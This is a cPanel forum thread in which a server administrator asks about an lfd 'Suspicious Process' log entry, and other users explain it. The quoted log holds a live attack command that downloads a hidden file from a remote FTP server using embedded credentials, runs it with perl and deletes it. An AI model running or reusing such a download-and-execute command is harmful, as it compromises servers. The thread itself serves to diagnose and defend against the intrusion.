Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Strange "Suspicious Process" in the configserv logs

Discussion in 'Security' started by Douglas Taylor, Mar 4, 2013.

  1. Douglas Taylor

    Joined:
    Oct 18, 2011
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    51
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    Code:
    Mar 4 20:09:42 ip-72-167-47-182 lfd[28771]: *Suspicious Process* PID:25132 PPID:25129 User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;wget ftp://muske:ted7862ted@85.214.65.162/.za.exe;curl -O ftp://muske:ted7862ted@85.214.65.162/.za.exe;perl .za.exe;rm -rf .za
    
    I have literally no idea who or what this is. Pointers? Thanks!
     
  2. Zepplin

    Zepplin Well-Known Member

    Joined:
    Oct 23, 2006
    Messages:
    93
    Likes Received:
    1
    Trophy Points:
    158
    Location:
    Blue Mountains, Australia
    cPanel Access Level:
    Root Administrator
  3. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    11
    Trophy Points:
    168
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find :(
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Douglas Taylor

    Joined:
    Oct 18, 2011
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    51
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    I chmod 700 wget and turning on mod_security in Apache and we'll see if that helps any.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice